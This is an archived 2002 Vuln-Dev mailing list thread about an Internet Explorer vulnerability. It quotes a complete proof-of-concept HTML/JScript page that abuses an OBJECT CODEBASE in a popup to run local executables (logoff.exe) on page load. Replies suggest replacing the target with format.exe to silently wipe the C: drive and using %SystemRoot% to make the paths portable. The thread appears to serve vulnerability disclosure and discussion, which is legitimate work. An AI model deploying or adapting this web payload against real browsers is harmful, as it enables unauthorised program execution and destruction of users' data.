Vulnerability Development mailing list archives

RE: Rather large MSIE-hole

From: "Jim Harrison (SPG)" <jmharr () microsoft com>
Date: Wed, 13 Mar 2002 11:58:30 -0800

While it's certainly true that you can hard-code any path you want to
any normally-benign executable on the system, any hacker worth their
salt would know how to get and use Windows system variables to make the
system cooperate in its own self-destruction.

For instance, "%SystemRoot%" would eliminate the need for "C:\windows"

* Jim Harrison 
MCP(NT4, 2K), A+, Network+



-----Original Message-----
From: NyQuist [mailto:nyquist () ntlworld com] 
Sent: Wednesday, March 13, 2002 12:46 AM
To: Magnus Bodin
Cc: Vuln-Dev
Subject: Re: Rather large MSIE-hole


If this is confirmed, could this array by changed to equal, erm...let's
say format.exe (with a couple of parameters to silently format C:/)?

 var programName=new Array(
        'c:/windows/system32/logoff.exe',
        'c:/winxp/system32/logoff.exe',
        'c:/winnt/system32/logoff.exe'

On Wed, 2002-03-13 at 06:06, Magnus Bodin wrote:

On Tue, Mar 12, 2002 at 11:32:20AM +0100, Magnus Bodin wrote:


The latest MSIE-hole is now spreading.


Sorry. Something broke there with the inclusion of the code. I've not 
done any large scale testing of this a part from getting reports from 
a lot of friends and colleagues that they are vulnerable still after 
running windows update.

Here it is, comlete with all the pop-up-code:

--%< cut here-----
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>

<META http-equiv=Content-Type content="text/html; 
charset=windows-1252"> <SCRIPT language=JScript>

var programName=new Array(
      'c:/windows/system32/logoff.exe',
      'c:/winxp/system32/logoff.exe',
      'c:/winnt/system32/logoff.exe'
);

function Init(){
      var oPopup=window.createPopup();
      var oPopBody=oPopup.document.body;
      var n,html='';
      for(n=0;n<programName.length;n++)
              html+="<OBJECT NAME='X'

CLASSID='CLSID:11111111-1111-1111-1111-111111111111'
CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";

      oPopBody.innerHTML=html;
      oPopup.show(290, 390, 200, 200, document.body);
}

</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>
--%< cut here-----


-- 
magnus                               MICROS~1 BOB was written in Lisp.

            http://x42.com/

-- 
NyQuist | Matthew Hall -- NyQuist at ntlworld dot com --
http://NyQuist.port5.com
Sig: #define QUESTION ((bb) || !(bb))

ubKey : 649779B0 (certserver.pgp.com)

Current thread:

Re: Rather large MSIE-hole, (continued)
- - Re: Rather large MSIE-hole NyQuist (Mar 13)
    - Re: Rather large MSIE-hole NoCoNFLiC (Mar 13)
    - Re: Rather large MSIE-hole methodic (Mar 14)
    - Re: Rather large MSIE-hole Felipe Franciosi (Mar 14)
    - Re: Rather large MSIE-hole KF (Mar 14)
    - Re: Rather large MSIE-hole jon schatz (Mar 14)
    - Re: Rather large MSIE-hole NoCoNFLiC (Mar 15)
- FW: [Re: Rather large MSIE-hole] another variant NoCoNFLiC (Mar 15)
  - Re: [Re: Rather large MSIE-hole] another variant (NAV and Finjan block this) David Barnett (Mar 16)
- Re: Rather large MSIE-hole foo BAR (Mar 12)
- RE: Rather large MSIE-hole Jim Harrison (SPG) (Mar 13)
  - Re: Rather large MSIE-hole Raul Dias (Mar 13)
- RE: Rather large MSIE-hole Maarten Oosterink (Mar 14)
  - Re: Rather large MSIE-hole Syzop (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
  - RE: Rather large MSIE-hole Ryan Sweat (Mar 14)
    - Re: Rather large MSIE-hole Keegan (Mar 14)
- Re: Rather large MSIE-hole Eric V Brown (Mar 14)
- RE: Rather large MSIE-hole Wall, Kevin (Mar 14)
- Re: Rather large MSIE-hole Paul D. Campbell (Mar 14)
  - Re: Rather large MSIE-hole KF (Mar 14)

(Thread continues...)